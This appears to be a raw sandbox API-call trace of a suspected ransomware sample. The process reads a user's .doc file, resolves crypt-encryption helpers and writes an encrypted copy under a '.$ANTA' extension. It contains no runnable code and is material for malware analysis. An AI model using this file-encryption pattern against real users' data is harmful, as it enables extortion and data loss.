(HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0130.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0130.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0130.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0130.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0130.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0130.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8ab0 [0130.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0130.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0130.113] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0130.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0130.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0130.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0130.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0130.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0130.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0130.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0130.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eaa90 [0130.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0130.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0130.113] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\5qUH.doc" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\5quh.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0130.114] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.114] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0130.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0130.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0130.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0130.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0130.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0130.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0130.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0130.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0130.114] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0130.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0130.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0130.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0130.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0130.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0130.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0130.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0130.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0130.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0130.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0130.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0130.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0130.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0130.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0130.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0130.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0130.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0130.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0130.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0130.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0130.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0130.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0130.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d9b0 [0130.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0130.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a608 [0130.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0130.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369d70 [0130.115] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9")) returned 0x10 [0130.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0130.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0130.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0130.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0130.116] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\5qUH.doc.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\5quh.doc.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0130.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0130.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0130.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0130.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0130.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0130.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0130.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0130.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0130.116] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0130.117] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0130.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0130.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0130.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0130.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0130.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0130.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0130.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0130.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0130.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0130.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0130.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x1b82020 [0130.120] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0130.120] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x2b91, lpOverlapped=0x0) returned 1 [0130.121] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0130.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0130.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0130.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0130.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0130.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x2b91) returned 0x43faa98 [0130.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b82020 | out: hHeap=0x1780000) returned 1 [0130.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0130.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0130.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0130.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0130.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0130.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x2b91) returned 0x49aa010 [0130.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43faa98 | out: hHeap=0x1780000) returned 1 [0130.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0130.125] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0130.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0130.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0130.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0130.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0130.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x2b91) returned 0x43faa98 [0130.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0130.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43faa98 | out: hHeap=0x1780000) returned 1 [0130.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0130.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0130.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0130.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0130.125] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0130.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0130.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0130.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0130.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0130.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0130.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0130.126] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0130.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0130.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0130.126] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0130.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0130.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0130.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0130.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2840 [0130.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0130.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0130.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0130.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0130.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x2b91) returned 0x43faa98 [0130.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0130.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27a0 [0130.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0130.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0130.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0130.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28b0 [0130.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0130.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0130.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0130.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2810 [0130.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0130.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0130.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0130.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab80 [0130.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0130.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0130.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0130.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0130.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0130.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x2b91) returned 0x49acbb0 [0130.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0130.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0130.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0130.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0130.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0130.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0130.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0130.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0130.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0130.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0130.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0130.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0130.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0130.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0130.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0130.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0130.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0130.128] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0130.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0130.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0130.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0130.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0130.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0130.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0130.128] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0130.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0130.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0130.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0130.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0130.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0130.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0130.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0130.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0130.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0130.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0130.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0130.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0130.128] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0130.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0130.129] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0130.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0130.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0130.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0130.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0130.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0130.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0130.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0130.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0130.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0130.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0130.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0130.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0130.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0130.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0130.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0130.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0130.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0130.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0130.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0130.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0130.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0130.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0130.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0130.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0130.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0130.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0130.130] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0130.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0130.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0130.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0130.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 